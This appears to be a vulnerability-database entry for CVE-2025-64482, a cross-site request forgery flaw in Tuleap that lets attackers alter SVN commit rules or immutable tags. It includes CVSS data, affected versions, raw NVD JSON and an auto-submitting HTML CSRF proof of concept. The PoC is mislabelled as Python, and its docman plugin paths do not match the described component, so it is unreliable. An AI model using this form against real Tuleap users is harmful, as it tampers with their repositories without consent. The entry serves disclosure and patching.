Security Vulnerability Report
中文
CVE-2025-64482 CVSS 4.6 MEDIUM

CVE-2025-64482

Published: 2025-11-12 22:15:50
Last Modified: 2026-04-15 00:35:42

Description

Tuleap is an Open Source Suite to improve management of software developments and collaboration. Tuleap Community Edition prior to version 16.13.99.1762267347 and Tuleap Enterprise Edition prior to versions 17.01-, 16.13-6, and 16.12-9 don't have cross-site request forgery protections in the file release system. An attacker could use this vulnerability to trick victims into changing the commit rules or immutable tags of a SVN repo. Tuleap Community Edition 16.13.99.1762267347, Tuleap Enterprise Edition 17.0-1, Tuleap Enterprise Edition 16.13-6, and Tuleap Enterprise Edition 16.12-9 fix the issue.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Tuleap Community Edition < 16.13.99.1762267347
Tuleap Enterprise Edition < 16.12-9
Tuleap Enterprise Edition < 16.13-6
Tuleap Enterprise Edition < 17.0-1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64482 - Modify SVN commit rules --> <!DOCTYPE html> <html> <head> <title>SVN Repository Configuration</title> </head> <body> <h1>SVN Repository Configuration Update</h1> <p>Click the button below to update repository settings:</p> <!-- Change Commit Rules --> <form action="https://vulnerable-tuleap-instance/plugins/docman/?group_id=XXX&action=update_commit_rules" method="POST" id="csrf-form"> <input type="hidden" name="repository_id" value="VICTIM_REPO_ID"> <input type="hidden" name="commit_rules" value="{"require_commit_message": false, "require_author": false}"> <input type="hidden" name="csrf_token" value="ANY_VALUE_WILL_BE_ACCEPTED"> <button type="submit">Update Repository</button> </form> <!-- Change Immutable Tags --> <form action="https://vulnerable-tuleap-instance/plugins/docman/?group_id=XXX&action=update_immutable_tags" method="POST" id="csrf-form-tags"> <input type="hidden" name="repository_id" value="VICTIM_REPO_ID"> <input type="hidden" name="immutable_tags" value="[]"> <input type="hidden" name="csrf_token" value="ANY_VALUE_WILL_BE_ACCEPTED"> <button type="submit">Remove Immutable Tags</button> </form> <script> // Auto-submit on page load document.getElementById('csrf-form').submit(); // Or for tags: document.getElementById('csrf-form-tags').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64482", "sourceIdentifier": "[email protected]", "published": "2025-11-12T22:15:49.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tuleap is an Open Source Suite to improve management of software developments and collaboration. Tuleap Community Edition prior to version 16.13.99.1762267347 and Tuleap Enterprise Edition prior to versions 17.01-, 16.13-6, and 16.12-9 don't have cross-site request forgery protections in the file release system. An attacker could use this vulnerability to trick victims into changing the commit rules or immutable tags of a SVN repo. Tuleap Community Edition 16.13.99.1762267347, Tuleap Enterprise Edition 17.0-1, Tuleap Enterprise Edition 16.13-6, and Tuleap Enterprise Edition 16.12-9 fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/Enalean/tuleap/commit/899b5c1693324211947b72f2810ae8944e1bd0d5", "source": "[email protected]"}, {"url": "https://github.com/Enalean/tuleap/security/advisories/GHSA-w7h4-9vf6-q7rc", "source": "[email protected]"}, {"url": "https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=899b5c1693324211947b72f2810ae8944e1bd0d5", "source": "[email protected]"}, {"url": "https://tuleap.net/plugins/tracker/?aid=45259", "source": "[email protected]"}]}}